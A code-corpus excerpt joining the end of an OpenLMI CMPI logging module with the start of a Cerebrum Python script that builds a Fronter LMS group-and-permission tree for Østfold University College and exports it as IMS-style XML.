format_strings = SPECIAL_FORMAT_STRINGS.copy()
if special_format_strings is not None:
format_strings.update(special_format_strings)
# set up new ones
if config.stderr:
err_handler = logging.StreamHandler()
err_handler.setLevel(logging_level)
err_handler.setFormatter(
DispatchingFormatter(format_strings, DEFAULT_FORMAT_STRING))
logger.addHandler(err_handler)
cmpi_handler = CMPILogHandler(env.get_logger(), logging_level)
cmpi_handler.setFormatter(
DispatchingFormatter(format_strings, DEFAULT_FORMAT_STRING))
logger.addHandler(cmpi_handler)
class LogManager(object):
"""
Class, which takes care of CMPI logging.
There should be only one instance of this class and it should be
instantiated as soon as possible, even before reading a config.
The config file can be provided later by set_config call.
    Use of this manager is an alternative to a single call to the
    ``setup()`` function of this module.
"""
def __init__(self, env):
"""
Initialize logging.
"""
self._env = env
self._config = None
@property
def config(self):
""" Provider configuration object. """
return self._config
@config.setter
def config(self, config):
"""
Set a configuration of logging. It applies its setting immediately
and also subscribes for configuration changes.
"""
self._config = config
config.add_listener(self._config_changed)
# apply the config
self._config_changed(config)
@property
def cmpi_handler(self):
""" Returns cmpi log handler passing logged messages to cimom. """
for handler in logging.getLogger('').handlers:
if isinstance(handler, CMPILogHandler):
return handler
return CMPILogHandler(self._env.get_logger())
@trace_method
def _config_changed(self, config):
"""
Apply changed configuration, i.e. start/stop sending to stderr
and set appropriate log level.
"""
setup(self._env, config)
def destroy(self):
"""
Shuts down the logging framework. No logging can be done
afterwards.
"""
logging.getLogger(__name__).debug('shutting down logging')
logging.shutdown()
def get_logger(module_name):
"""
    Convenience function for getting a callable returning the logger for a
    particular module name. It's supposed to be used at module level to
    assign its result to a global variable like this:
LOG = cmpi_logging.get_logger(__name__)
This can be used in module's functions and classes like this:
def module_function(param):
LOG().debug("this is debug statement logging param: %s", param)
    Thanks to ``LOG`` being a callable, it always returns a valid logger
    object with the current configuration, which may change over time.
"""
def _logger():
""" Callable used to obtain current logger object. """
return logging.getLogger(module_name)
return _logger
|
openlmi/openlmi-doc
|
doc/python/lmi/providers/cmpi_logging.py
|
Python
|
gpl-2.0
| 17,541
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright 2009-2018 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""This file contains the code to generate an XML file for import into
Fronter, HiØf's LMS.
It works in conjunction with populate_fronter_groups.py and is meant to
complement it -- p_f_g generates the necessary groups whereas g_f_x generates
an XML file from these groups.
All groups making the basis for XML output are tagged with a special trait,
and they have a highly structured name.
The script works like this:
- Grab all group_ids generated by populate_fronter_groups (they are tagged
by a special trait) -- collect_cf_groups.
- Parse undenh/undakt files and build a dict to remap multisemester
entities -- build_multisemester_mapping.
- Build a tree, in memory, representing the fronter tree
(build_cf_tree). The tree is built by successively inserting a node for a
cerebrum group (CfMemberGroup) into the tree
(create_associated_structures). Permissions are registered as well.
- Once the tree is complete, it's output to an XML file. We output (in
order): all the people (output_people), all the groups (structure- and
member -- output_member_groups), all the memberships representing people
being in a group, and finally all the permissions (these are memberships
as well, but between groups only)
- Profit!
"""
from __future__ import unicode_literals
import argparse
import datetime
import logging
import re
from collections import deque
import six
import cereconf
import Cerebrum.logutils
import Cerebrum.logutils.options
from Cerebrum.Utils import Factory
from Cerebrum.utils.atomicfile import SimilarSizeWriter
from Cerebrum.extlib import xmlprinter
from Cerebrum.modules.xmlutils.fsxml2object import EduDataGetter
from Cerebrum.modules.no.hiof.fronter_lib import lower
from Cerebrum.modules.no.hiof.fronter_lib import count_back_semesters
from Cerebrum.modules.no.hiof.fronter_lib import timeslot_is_valid
from Cerebrum.modules.Email import EmailAddress
from Cerebrum.modules.Email import EmailTarget
from Cerebrum.modules.Email import EmailServer
from Cerebrum import Errors
STATUS_ADD = "1"
STATUS_UPDATE = "2"
STATUS_DELETE = "3"
logger = logging.getLogger(__name__)
uname_suffix = ''
@six.python_2_unicode_compatible
class CfPermission(object):
"""Permission handling.
Objects of this class capture the fact that a group has a certain
permission granted on another group.
"""
ROLE_READ = '01'
ROLE_WRITE = '02'
ROLE_DELETE = '06'
ROLE_CHANGE = '07'
access2symbol = {
ROLE_READ: "READ",
ROLE_WRITE: "WRITE",
ROLE_DELETE: "DELETE",
ROLE_CHANGE: "CHANGE",
}
def __init__(self, access_type, recursive, holder, target):
# Does the permission apply recursively?
self._recursive = recursive
# read/write/delete/change
self._access = access_type
# the group that has the permissions on target
self._holder = holder
# the 'victim' of the permission assignment
self._target = target
assert self._access in self.access2symbol
def access_type(self):
return self._access
def is_recursive(self):
return self._recursive
def target(self):
return self._target
def holder(self):
return self._holder
def __str__(self):
return "cf_perm %s (%s) for %s on %s" % (
self.access2symbol[self.access_type()],
self.is_recursive() and "recursive" or "non-recursive",
self.holder(),
self.target())
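# Illustrative construction of a permission (holder and target would be
# CfMemberGroup and CfStructureGroup instances built elsewhere in this
# script; the variable names here are hypothetical):
#   perm = CfPermission(CfPermission.ROLE_READ, recursive=True,
#                       holder=role_group, target=room)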
class CfTree(object):
"""
Representation of the data structure to be pushed to the XML file.
"""
def __init__(self, db):
self._root = None
self._person_group_holder = None
self._cf_id2node = dict()
self._db = db
self._build_static_nodes()
def _build_static_nodes(self):
"""Build the static part of OA/hiof's CF tree"""
self._root = CfStructureGroup("Oslofjordalliansen", "root", None)
self.register_structure_group(self._root)
hiof = CfStructureGroup("HiØ", "STRUCTURE:hiof.no", self._root)
self.register_structure_group(hiof)
tmp = CfStructureGroup("Automatisk",
"STRUCTURE:hiof.no:automatisk", hiof)
self.register_structure_group(tmp)
tmp = CfStructureGroup("Manuell",
"STRUCTURE:hiof.no:manuell", hiof)
self.register_structure_group(tmp)
# It knows about root, but not the other way
# around. _person_group_holder is somewhat special -- it's a fake
# node: it does not have any members, really, it is only a container
# for all groups with members in them.
self._person_group_holder = CfStructureGroup(
"Samlenode for persongruppene",
"STRUCTURE:hiof.no:persongruppene",
None)
self._person_group_holder._parent = self._root
def get_cf_group(self, cf_id, default=None):
return self._cf_id2node.get(cf_id, default)
def register_member_group(self, cfmg):
assert isinstance(cfmg, CfMemberGroup)
cf_group_id = cfmg.cf_id()
self._cf_id2node[cf_group_id] = cfmg
def register_structure_group(self, cfsg):
assert isinstance(cfsg, CfStructureGroup)
cf_group_id = cfsg.cf_id()
self._cf_id2node[cf_group_id] = cfsg
def create_associated_siblings(self, cf_group):
"""Create sibling nodes stemming from a given node.
NB! This creates cf_structure_groups only.
"""
for s_name, s_id in cf_group.cf_yield_siblings():
if self.get_cf_group(s_id):
continue
parent = self.get_cf_group(cf_group.cf_parent_id())
assert parent is not None
nn = CfStructureGroup(s_name, s_id, parent)
self.register_structure_group(nn)
parent.add_child(nn)
logger.debug("Created sibling %s from %s under parent %s",
nn, cf_group, parent)
def create_associated_structures(self, cf_group, multisemester_map):
"""Given a cf_member/structure_group, create *ALL* the necessary
associated groups upwards in the structure tree.
cf_group may be either a cf_structure_group or a CfMemberGroup.
For cf_structure_group we figure out which group is the parent. If it
does not exist, it's created (recursively).
For CfMemberGroup we figure out which structure group it corresponds
to. If it does not exist, it's created (recursively).
@return:
This returns a group that cf_group should be associated
with. I.e. cf_group's 'closest' node in the structure hierarchy
"""
if cf_group.cf_id() in multisemester_map:
structure_id = multisemester_map[cf_group.cf_id()]
logger.debug("Selecting a remapped parent-id: %s -> %s",
cf_group.cf_id(), structure_id)
else:
structure_id = cf_group.cf_parent_id()
if structure_id is None:
logger.debug("No structure created for cf_group=%s", cf_group)
return None
if self.get_cf_group(structure_id):
self.get_cf_group(structure_id).add_child(cf_group)
self.create_associated_siblings(cf_group)
return self.get_cf_group(structure_id)
# No parent -> create new one
# Regardless of cf_group's type, we create cf_structure_groups only.
logger.debug("Creating new node id=%s (parent for %s)",
structure_id, cf_group.cf_id())
new_node = CfStructureGroup(cf_group.cf_parent_title(),
structure_id,
# None, since we don't know what the
# parent is at this point.
None)
self.register_structure_group(new_node)
new_node.add_child(cf_group)
self.create_associated_siblings(cf_group)
# This will eventually stop at a node that already exist, since we
# have several static nodes in the tree.
grandparent_node = self.create_associated_structures(new_node,
multisemester_map)
# This will fix new_node's parent link as well.
grandparent_node.add_child(new_node)
return new_node
def iterate_groups(self, group_type=None):
"""Create an iterator for the specific group type in the CF-tree.
"""
        for seq in (six.itervalues(self._cf_id2node),
(self._person_group_holder,)):
for group in seq:
if (group_type is None or
isinstance(group, group_type)):
yield group
def iterate_groups_topologically(self, group_type=None):
"""Create an iterator for the specific group type(s) that outputs
groups in topological order.
Fronter requires parent groups to be output before children, in order
for their import routines to function properly.
"""
if not self._root:
return
work_queue = deque((self._root, self._person_group_holder))
while work_queue:
current = work_queue.popleft()
if group_type is None or isinstance(current, group_type):
yield current
# Enqueue all the children (CfMemberGroup does not have
# structural children, which are of interest here)
if not isinstance(current, CfStructureGroup):
continue
for child_group in current.iterate_children(group_type):
work_queue.append(child_group)
def get_root(self):
return self._root
class CfGroupInterface(object):
"""An interface capturing the common functionality of person- and structure
groups.
"""
_acronym2avdeling = None
def __init__(self):
self._parent = None
@staticmethod
def load_acronyms(db):
result = dict()
ou = Factory.get("OU")(db)
const = Factory.get("Constants")()
for row in ou.search_name_with_language(
entity_type=const.entity_ou,
name_variant=const.ou_name_acronym,
name_language=const.language_nb):
ou.clear()
ou.find(row["entity_id"])
key = "%02d%02d%02d" % (ou.fakultet, ou.institutt, ou.avdeling)
result[key] = row["name"]
CfGroupInterface._acronym2avdeling = result
def __eq__(self, other):
return self.cf_id() == other.cf_id()
def __hash__(self):
return hash(self.cf_id())
def cf_group_type(self):
raise NotImplementedError("N/A")
def cf_id(self):
raise NotImplementedError("N/A")
def cf_title(self):
raise NotImplementedError("N/A")
def cf_parent_id(self):
raise NotImplementedError("N/A")
def cf_typevalue(self):
raise NotImplementedError("N/A")
def cf_template(self):
raise NotImplementedError("N/A")
@staticmethod
def kull_room_title(stprog, semester, year):
return "Rom for kull %s %s %s" % (stprog, semester, year)
def cf_parent_title(self):
"""Figure out the title of the group where self is a member"""
# If the parent link already exists, we are done
if self._parent:
return self._parent.cf_title()
# If not, let's guess
parent_id = self.cf_parent_id()
parent_components = parent_id.split(":")
if "klasse" in parent_components:
return "Rom for kull %s %s %s, klasse %s" % (
parent_components[-6],
parent_components[-3],
parent_components[-4],
parent_components[-1])
if "kull" in parent_components:
# fellesrom is for student-kull group's parent only ...
if self.cf_group_type() == "student-kull":
return self.kull_room_title(parent_components[-4],
parent_components[-1],
parent_components[-2])
# 2 possibilities here -- self is either a ROOM or a group with a
# kull role holder. In all cases the parent is the same - kull
        # corridor. In either case the parent's name is deduced similarly.
#
idx = parent_components.index("kull")
return "Kull %s %s %s" % (
parent_components[idx-1], # stprog
parent_components[idx+2], # terminkode
parent_components[idx+1]) # arstall
elif "studieprogram" in parent_components:
idx = parent_components.index("studieprogram")
return "Studieprogram %s" % parent_components[idx+1].upper()
elif ("undenh" in parent_components or
"undakt" in parent_components):
# group's description (cf_title()) has the right semester number
# even for multisemester undenh/undakt, this structure will have
# the right title.
# FIXME: It is somewhat ugly to rely on a certain structure in
# group names
title_components = self.cf_title().split(" ")
return "Rom for " + " ".join(title_components[2:])
elif "emner" in parent_components:
idx = parent_components.index("emner")
return "Emnerom %s %s" % (parent_components[idx+2],
parent_components[idx+1])
# avdeling
elif len(parent_components) == 5 and parent_components[-1].isdigit():
return "%s" % self._acronym2avdeling[parent_components[-1]]
elif "automatisk" in parent_components:
return "Automatisk"
# for the sake of completeness
elif "manuell" in parent_components:
return "Manuell"
elif "persongruppene" in parent_components:
return "Samlenode for persongruppene"
elif parent_id == "root":
return "Oslofjordalliansen"
assert False, "This cannot happen: parent_id=%s" % parent_id
def cf_yield_siblings(self):
"""Return sibling node information to create alongside self.
This may come in handy when a creation of one node (be it
CfMemberGroup or cf_structure_group) necessarily entails creating
additional nodes at the same level.
By default, no action is performed. This method returns a generator.
"""
return ((cf_name, cf_id) for (cf_name, cf_id) in ())
@six.python_2_unicode_compatible
class CfStructureGroup(CfGroupInterface):
"""A group representing a structure (a room or a corridor) in CF.
This class deals with intergroup relations in CF (permissions,
parent-child relations, etc.). Some cf_structure_groups would have
CfMemberGroup(s) associated with them (typically student / FS role
holder groups). That association is used to grant access permissions in
CF.
"""
valid_types = ("STRUCTURE", "ROOM")
def __init__(self, description, cf_id, parent):
super(CfStructureGroup, self).__init__()
self._cf_id = cf_id
self._title = description
self._parent = parent
if self._parent:
self._parent.add_child(self)
self._structure_children = dict()
self._permissions = dict()
self._group_type = self._calculate_group_type()
def cf_typevalue(self):
"""Return a suitable text value for <typevalue> XML element.
The meaning of the code values is:
0 - node
1 - corridor
2 - group
4 - room.
"""
# FIXME: this is so horribly hackish. There should be a general way of
# calculating the <typevalue>.
if self.cf_id() in ("root",
"STRUCTURE:hiof.no",
"STRUCTURE:hiof.no:automatisk",
"STRUCTURE:hiof.no:manuell",
"STRUCTURE:hiof.no:persongruppene"):
return "0"
# avdeling -> node as per specification
components = self.cf_id().split(":")
if len(components) == 5 and components[-1].isdigit():
return "0"
# all other STRUCTURE entities are corridors
if self.cf_group_type() == "STRUCTURE":
return "1"
if self.cf_group_type() == "ROOM":
return "4"
assert False, "This cannot happen"
def cf_is_kull_fellesrom(self):
"""Is self fellesrom for a kull?"""
components = self.cf_id().split(":")
return (self.cf_group_type() == "ROOM" and
"kull" in components and
"klasse" not in components)
def cf_is_kull_corridor(self):
"""Is self a kull corridor?"""
components = self.cf_id().split(":")
return (self.cf_group_type() == "STRUCTURE" and
"kull" in components)
def fixup_sibling_permissions(self):
"""Propagate permissions from kullklasse roles to fellesrom for kull.
        Those holding role permissions on a kullklasse room have the same
        permission set on the kull room (fellesrommet for kullet).
"""
if not self.cf_is_kull_corridor():
return
# Does self have fellesrom at all? (it ought to, but let's pretend we
# need to check this)
holders = set()
fellesrom = None
for child in self.iterate_children(CfStructureGroup):
for permission in child.iterate_permissions():
if not permission.holder().cf_is_student_group():
holders.add(permission.holder())
if child.cf_is_kull_fellesrom():
fellesrom = child
# if we have fellesrom, every group in 'holders' gets a permission on
# fellesrom.
if fellesrom is None:
return
# let's go
for holder in holders:
logger.debug("%s receives additional permissions from sibling %s",
fellesrom, holder)
fellesrom.register_permissions(holder)
def cf_template(self):
assert self.cf_group_type() in self.valid_types
if self.cf_group_type() == "ROOM":
return "Mal-rom OA 2"
def cf_id(self):
return self._cf_id
def cf_title(self):
return self._title
def cf_group_type(self):
return self._group_type
def cf_parent_id(self):
"""Calculate which *structure* group is the parent of this group.
If the _parent link has already been established, there is nothing to
do. However, until the _parent link is set, we don't have the actual
parent node and have to calculate the id itself.
The idea is to figure out which parent structure group a given
structure group should be associated with. This happens during the
creation of the cf structure tree.
"""
# If the parent link already exists, we are done.
if self._parent:
return self._parent.cf_id()
# Now, which structure node is this?
components = self.cf_id().split(":")
if self.cf_group_type() == "ROOM":
# kullklasse
if "klasse" in components:
result = ["STRUCTURE", ] + components[1:-2]
# kull, fellesrom
elif "kull" in components:
result = ["STRUCTURE", ] + components[1:]
            # The guesswork below is potentially incorrect (it will be wrong
            # for multisemester undenh/undakt). However, the proper remapping
            # happens elsewhere, and this just captures the general case.
elif "undenh" in components:
result = ["STRUCTURE", ] + components[1:-4]
elif "undakt" in components:
result = ["STRUCTURE", ] + components[1:-5]
else:
assert False, "This cannot happen: self.id=%s" % self.cf_id()
return ":".join(result)
else:
# kull -> stprog
if "kull" in components:
result = components[:-3]
# stprog -> avdeling
elif "studieprogram" in components:
result = components[:-2]
# emnerom -> avdeling
elif "emner" in components:
result = components[:-3]
# avdeling -> automatisk
elif len(components) == 5 and components[-1].isdigit():
return "STRUCTURE:hiof.no:automatisk"
# root is special
elif self.cf_id() == "root":
return self.cf_id()
else:
assert False, "This cannot happen: self.id=%s" % self.cf_id()
return ":".join(result)
def _calculate_group_type(self):
"""Figure out what kind of structure group this is -- STRUCTURE
(corridor) or ROOM"""
# root is special. UNFORTUNATELY
if self.cf_id() == "root":
return "STRUCTURE"
components = self.cf_id().split(":")
assert components[0] in self.valid_types
return components[0]
def add_child(self, child):
self._structure_children[child.cf_id()] = child
# this will allow us to create parentless nodes, and have them fixed
# up later on. _parent slot is initialised to None.
if child._parent != self:
child._parent = self
def iterate_children(self, child_type=None):
        for child in six.itervalues(self._structure_children):
if child_type is None or isinstance(child, child_type):
yield child
def iterate_permissions(self):
return self._permissions.itervalues()
def register_permissions(self, cf_group):
assert isinstance(cf_group, CfMemberGroup)
permission = cf_group.get_cf_permission(self)
if permission is not None:
self._permissions[cf_group.cf_id()] = permission
logger.debug("Registered permission %s", permission)
def __str__(self):
return ("CFSG id=%s (parent=%s), %d structure members, "
"%d perm groups" % (
self.cf_id(),
self._parent and self._parent.cf_id() or "No parent",
len(self._structure_children),
len(self._permissions)))
@six.python_2_unicode_compatible
class CfMemberGroup(CfGroupInterface):
"""A group holding members of a Cerebrum group for CF.
All cf_member_groups are 'associated' with a cf_structure_group and
cf_member_groups are meant to capture user members, whereas
cf_structure_group captures the overall structure group.
This class deals with member management and storing member attributes to
export to CF (unames, e-mails, etc)
"""
# FS role groups
valid_types = ("stprog", "kull", "kullklasse", "undenh", "undakt",
"avdeling",
# FS student groups
"student-undenh", "student-undakt",
"student-kull", "student-kullklasse",)
def __init__(self, group):
super(CfMemberGroup, self).__init__()
self._cf_id = group.group_name
self._title = group.description
self._account_ids = [x["member_id"]
for x in group.search_members(
group_id=group.entity_id)]
self._group_type = self._calculate_group_type()
self._parent = None
assert self._group_type in self.valid_types, \
"Cannot deduce type for group id=%s/name=%s: type=%s" % (
group.entity_id,
group.group_name,
self._group_type)
def cf_typevalue(self):
"""Return a suitable text value for <typevalue> XML element.
The meaning of the code values is:
0 - node
1 - corridor
2 - group
4 - room.
"""
# CfMemberGroup objects represent 'group' typevalues. Always.
return "2"
def cf_id(self):
return self._cf_id
def cf_title(self):
return self._title
def cf_group_type(self):
return self._group_type
def cf_is_student_group(self):
return self.cf_group_type() in ("student-undenh",
"student-undakt",
"student-kull",
"student-kullklasse",)
def cf_parent_id(self):
"""Calculate which *structure* group this member group corresponds to.
The idea is to figure out which structure group a given member group
should be associated with. Member groups are 'extracted' directly from
Cerebrum, whereas structure groups will have to be deduced.
"""
if self._parent is not None:
return self._parent.cf_id()
group_type2cf_structure_fixup = {
"student-undenh": ("ROOM", -1),
"student-undakt": ("ROOM", -1),
"student-kull": ("ROOM", -1),
"student-kullklasse": ("ROOM", -1),
"undenh": ("ROOM", -2),
"undakt": ("ROOM", -2),
"kullklasse": ("ROOM", -2),
"kull": ("STRUCTURE", -2),
"stprog": ("STRUCTURE", -2),
"avdeling": ("STRUCTURE", -2),
}
member_group_type = self.cf_group_type()
if member_group_type in group_type2cf_structure_fixup:
prefix, last = group_type2cf_structure_fixup[member_group_type]
components = self.cf_id().split(":")
return ":".join([prefix, ] + components[:last])
else:
assert False, "This cannot happen: cf_member id=%s/type=%s" % (
self.cf_id(), member_group_type)
def cf_yield_siblings(self):
if self.cf_group_type() != "kull":
return
# Holding a role with 'kull' implies that the corresponding
# ROOM/Felles:...:kull MUST be created.
components = self.cf_id().split(":")
k_title = self.kull_room_title(components[5], # stprog
components[8], # semester
components[7]) # year
k_id = ":".join(["ROOM", ] + components[:-2])
for cf_name, cf_id in ((k_title, k_id),):
yield cf_name, cf_id
def _role_code(self):
"""What kind of role code does self correspond to?
This makes sense for role groups only (i.e. NOT student-groups)
"""
components = self.cf_id().split(":")
assert "rolle" in components
for marker in ("assistent", "hovedlærer", "kursansv", "lærer",
"kontakt", "veileder", "admin",):
if marker in components:
return marker
assert False, \
"Impossible: unknown role code for cd id=%s" % self.cf_id()
def get_cf_permission(self, structure_group):
"""Calculate permission for self on L{structure_group}.
The calculations are a bit involved, since the permission in question
depends on both self AND structure_group.
"""
all_read = {
"stprog": CfPermission.ROLE_READ,
"kull": CfPermission.ROLE_READ,
"kullklasse": CfPermission.ROLE_READ,
"undenh": CfPermission.ROLE_READ,
"undakt": CfPermission.ROLE_READ,
"avdeling": CfPermission.ROLE_READ,
}
all_write = {
"stprog": CfPermission.ROLE_WRITE,
"kull": CfPermission.ROLE_WRITE,
"kullklasse": CfPermission.ROLE_WRITE,
"undenh": CfPermission.ROLE_WRITE,
"undakt": CfPermission.ROLE_WRITE,
"avdeling": CfPermission.ROLE_WRITE,
}
all_delete = {
"stprog": CfPermission.ROLE_DELETE,
"kull": CfPermission.ROLE_DELETE,
"kullklasse": CfPermission.ROLE_DELETE,
"undenh": CfPermission.ROLE_DELETE,
"undakt": CfPermission.ROLE_DELETE,
"avdeling": CfPermission.ROLE_DELETE,
}
all_change = {
"stprog": CfPermission.ROLE_CHANGE,
"kull": CfPermission.ROLE_CHANGE,
"kullklasse": CfPermission.ROLE_CHANGE,
"undenh": CfPermission.ROLE_CHANGE,
"undakt": CfPermission.ROLE_CHANGE,
"avdeling": CfPermission.ROLE_CHANGE,
}
role_code2permission = {
"assistent": all_read,
"hovedlærer": all_change,
"kursansv": all_write,
"lærer": all_delete,
"kontakt": all_read,
"veileder": all_write,
"admin": {
"stprog": CfPermission.ROLE_CHANGE,
"kull": CfPermission.ROLE_CHANGE,
"kullklasse": CfPermission.ROLE_CHANGE,
"undenh": CfPermission.ROLE_WRITE,
"undakt": CfPermission.ROLE_WRITE,
"avdeling": CfPermission.ROLE_CHANGE,
},
}
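        # Example: a "kursansv" role group on an undenh maps to ROLE_WRITE,
        # while "admin" maps to ROLE_CHANGE everywhere except on
        # undenh/undakt, where it only gets ROLE_WRITE.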
recursive = False
if self.cf_group_type() in ("stprog", "kull", "avdeling"):
recursive = True
if self.cf_group_type() in ("student-undenh", "student-undakt",
"student-kullklasse", "student-kull",):
access_type = CfPermission.ROLE_WRITE
elif self.cf_group_type() in ("undenh", "undakt", "kullklasse",
"kull", "stprog", "avdeling",):
# These are the perms stemming from FS roles. We have to look at
# the specific role
role_code = self._role_code()
access_type = role_code2permission[role_code][self.cf_group_type()]
else:
logger.debug("Weird group type for %s", self)
assert False, "This cannot happen"
perm_object = CfPermission(access_type, recursive,
holder=self,
target=structure_group)
return perm_object
def _calculate_group_type(self):
"""Figure out what kind of group this is."""
suffix_map = {"undenh": "undenh",
"undakt": "undakt",
"klasse": "kullklasse",
"studieprogram": "stprog",
"kull": "kull", }
components = self.cf_id().split(":")
if "student" in components:
# don't reshuffle the list (the tests have to be performed in a
# specific order)
for marker in ("undenh", "undakt", "klasse", "kull",):
if marker in components:
return "student-" + suffix_map[marker]
assert False, "This is impossible - no type for %s" % self.cf_id()
elif "rolle" in components:
for marker in ("undakt", "undenh",
"klasse", "kull", "studieprogram"):
if marker in components:
return suffix_map[marker]
if (len(components) == 6 and
re.search(r"^\d\d0000$", components[3])):
return "avdeling"
assert False, "NOTREACHED"
def __str__(self):
return "CFMG type=%s id=%s %d members" % (self.cf_group_type(),
self.cf_id(),
len(self._account_ids))
def iterate_members(self):
return iter(self._account_ids)
class CfMembers(object):
"""A class to keep track of person information in CF.
Technically, this class is superfluous. However, we can cache a lot of
information about people in order to speed up the output. All that caching
is contained within this class. The only interface available is
L{member_info}, which looks up all the necessary info by account_id.
"""
def __init__(self, db):
self.db = db
self.const = Factory.get("Constants")(db)
def account2uname(self):
"""Construct a mapping from account_id to account_name.
"""
account = Factory.get("Account")(self.db)
result = dict()
for row in account.list_names(self.const.account_namespace):
result[row["entity_id"]] = row["entity_name"] + uname_suffix
return result
def email2mail_server(self, email):
# This can't be the right way...
try:
ea = EmailAddress(self.db)
ea.find_by_address(email)
et = EmailTarget(self.db)
et.find(ea.get_target_id())
es = EmailServer(self.db)
es.find(et.get_server_id())
return es.name
except Errors.NotFoundError:
return ""
def person2address(self, person_id):
person = Factory.get("Person")(self.db)
person.find(person_id)
def remap(x):
if x is None:
return six.text_type()
return six.text_type(x).strip()
for source_system in (self.const.system_sap,
self.const.system_fs):
for addr_type in (self.const.address_post,
self.const.address_street):
addr = person.get_entity_address(source=source_system,
type=addr_type)
if len(addr) == 1:
addr = addr[0]
return {"street": remap(addr["city"]), }
# "pobox": remap(addr["p_o_box"]),
# FIXME: IMS limits this field to 128 chars. This
# should be enforced and split into multiple <=128
# char chunks.
# hiof requests city part only.
# According to Fronter, 'locality' is not
# supported yet (2009-08-18), and we are asked to
# use "street", although city-part should be in
# 'locality' if IMS Ent is followed
def member_info(self):
"""Slurp in info about all members.
There is a bit of dict-building in this method. That takes time.
@rtype: dict (int -> dict (str -> str))
@return:
A dictionary from account_ids to dicts with the corresponding
information. The following keys are available:
- full (account owner's name)
- first (account owner's first name)
- family (account owner's last name)
- email (email address associated with account)
          - user (uname@<suffix>)
- imap-server (imap server associated for email)
- address (a dict representing account owner's address)
- mobile (account owner's mobile work number from SAP)
"""
account = Factory.get("Account")(self.db)
person = Factory.get("Person")(self.db)
const = self.const
result = dict()
logger.debug("Caching e-mail addresses")
uname2mail = account.getdict_uname2mailaddr()
logger.debug("%d uname -> e-mail mappings", len(uname2mail))
logger.debug("Caching member names")
person_id2name = person.getdict_persons_names(
source_system=const.system_cached,
name_types=[const.name_first, const.name_full, const.name_last])
logger.debug("%d person_id -> name mappings", len(person_id2name))
logger.debug("Caching mobile phone numbers")
person_id2phone = dict((int(x["entity_id"]), x["contact_value"])
for x in person.list_contact_info(
contact_type=const.contact_mobile_phone,
entity_type=const.entity_person,
source_system=const.system_sap))
logger.debug("Caching complete user records")
candidates = account.search(owner_type=const.entity_person)
logger.debug("%d candidates to consider", len(candidates))
for row in candidates:
person_id = row["owner_id"]
uname = row["name"]
account_id = row["account_id"]
if uname not in uname2mail:
logger.debug(
"Ignoring id=%s/uname=%s (person_id=%s): no e-mail",
account_id, uname, person_id)
continue
email_address = uname2mail[uname]
if person_id not in person_id2name:
logger.debug(
"Ignoring id=%s/uname=%s (person_id=%s): no name info",
account_id, uname, person_id)
continue
first_name = person_id2name[person_id].get(const.name_first, "")
full_name = person_id2name[person_id].get(const.name_full, "")
family_name = person_id2name[person_id].get(const.name_last, "")
result[account_id] = {
"full": full_name,
"first": first_name,
"family": family_name,
"email": email_address,
"user": uname + uname_suffix,
"imap-server": self.email2mail_server(email_address),
"imap-user": uname,
"address": self.person2address(person_id),
"mobile": person_id2phone.get(person_id)
}
logger.debug("Collected a total of %d user records", len(result))
return result
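# Shape of a single member_info() record (all values are hypothetical):
#   {"full": "Jane Doe", "first": "Jane", "family": "Doe",
#    "email": "jdoe@example.org", "user": "jdoe",
#    "imap-server": "imap.example.org", "imap-user": "jdoe",
#    "address": {"street": "Halden"}, "mobile": "+47 99999999"}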
def collect_cf_groups(db):
"""Collect all CF groups from Cerebrum."""
group = Factory.get("Group")(db)
const = Factory.get("Constants")()
result = set(r["entity_id"] for r in
group.list_traits(code=const.trait_cf_group))
logger.debug("Collected %d CF groups from Cerebrum", len(result))
return result
def locate_db_group(db, group_id):
"""Create a Group proxy for the specified group_id.
"""
group = Factory.get("Group")(db)
group.find(group_id)
return group
def build_cf_tree(db, db_groups, multisemester_map):
"""Construct a complete CF tree with all groups and permissions.
@param db:
A database proxy.
@param db_groups:
Complete list of cerebrum group_ids which are the basis for CF
population.
"""
CfGroupInterface.load_acronyms(db)
tree = CfTree(db)
for group_id in db_groups:
db_group = locate_db_group(db, group_id)
cf_member = CfMemberGroup(db_group)
tree.register_member_group(cf_member)
logger.debug("Created CF group %s", cf_member)
# Now that we have the group node, we create the corresponding
# structure nodes (all of them).
node = tree.create_associated_structures(cf_member, multisemester_map)
if node:
logger.debug(
"Created assoc structures for cf_member id=%s. "
"Parent node is id=%s", cf_member.cf_id(), node.cf_id())
node.register_permissions(cf_member)
else:
logger.debug("No node created for cf_member id=%s",
cf_member.cf_id())
# fixup additional permissions between the siblings of each node, since
# the permission assignment up to this point has been top-down.
for group in tree.iterate_groups(CfStructureGroup):
group.fixup_sibling_permissions()
logger.debug("Built a CF tree")
return tree
def open_xml_stream(filename):
"""Open the xml file for writing.
@return:
Return an xmlprinter instance ready for output.
"""
sink = SimilarSizeWriter(filename, "wb")
sink.max_pct_change = 50
printer = xmlprinter.xmlprinter(sink,
indent_level=2,
data_mode=1,
input_encoding="utf-8")
logger.debug("Opened %s for XML output", filename)
return printer
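# Note: SimilarSizeWriter acts as a safety net here -- if the size of the new
# file deviates from the previous run's output by more than max_pct_change
# percent (50 here), the file is not replaced. This guards against publishing
# a truncated export.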
def output_fixed_header(printer):
printer.startElement("properties")
printer.dataElement("datasource", "cerebrum@hiof.no")
printer.dataElement("datetime", datetime.date.today().strftime("%Y-%m-%d"))
printer.endElement("properties")
def output_source_element(printer):
printer.dataElement("source", "cerebrum@hiof.no")
def output_id(id_data, printer):
printer.startElement("sourcedid")
output_source_element(printer)
printer.dataElement("id", id_data)
printer.endElement("sourcedid")
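# For reference, output_id emits an IMS Enterprise sourcedid element, roughly
# (id value illustrative):
#
#   <sourcedid>
#     <source>cerebrum@hiof.no</source>
#     <id>some-id</id>
#   </sourcedid>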
def output_person_auth(data, printer):
# "ldap3:" - ldap authentication (3 is probably the server number)
# "1" for pwencryptiontype means md5
# "5" means authentication via ldap
printer.dataElement("userid", data["user"],
{"password": "ldap3:", "pwencryptiontype": "5", })
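# The resulting element looks roughly like this (username illustrative):
#
#   <userid password="ldap3:" pwencryptiontype="5">jdoe</userid>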
